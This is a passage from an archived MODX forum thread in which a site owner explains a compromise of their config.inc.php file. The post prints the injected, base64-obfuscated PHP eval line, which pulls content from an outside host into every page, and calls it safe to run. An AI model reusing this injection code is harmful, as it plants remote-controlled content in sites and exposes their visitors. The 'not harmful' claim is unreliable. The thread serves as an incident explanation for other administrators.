We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

has my site bee hacked or is it a virus on the server?

  • Frogabog Reply #11, 11 years, 7 months ago
    Does your control panel at your host have any php configuration scripts available? Something like CGI Scripting, or EZ PHP Config (could be titled anything). Just because you don't have access to the file, it shouldn't mean there's no way to configure it. At minimum, they should be able to configure or check the file itself for you as needed.



      Frogabog- MODX Websites in Portland Oregon
      "Do yourself a favor and get a copy of "MODX - The Official Guide" by Bob Ray. Read it.
      Having server issues? These guys have MODX Hosting perfected - SkyToaster
      • 38758
      • 9 Posts
      Marius Cucuruz Reply #12, 11 years, 6 months ago
      Hi all,
      Thanks again for your feedback. We've managed to solve the crisis eventually. I actually feel stupid for not having noticed the first time...

      So it was a server thing that got to the ./core/config/config.inc.php file. What it did was to add 2 quite simple (and not too obvious) lines:

      ob_start();
eval(base64_decode("ZWNobyBAZmlsZV9nZXRfY29u
dGVudHMoImh0dHA6Ly93d3cuYmV0Z WtzLmNvbS9mY
XFldC5waHA/dXJsPSIuJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0pOw=="));

      (you can run it safely, it's not harmful)

      What that does is it fetches the contents of a remote file (beteks.com/faqet.php) and just echoes it. And because your Modx file is used throughout the site, that code will show up EVERYWHERE. It is not harmful, but it will mess up the manager quite a bit. And because it's hidden under "base64_decode" it may not catch your eye at very beginning. Kinda makes sense now tongue

      The lesson here is that you need to protect your site and server and try to stay away from shared hosting, if you can!


      Thanks you al so very much!
      Cheers!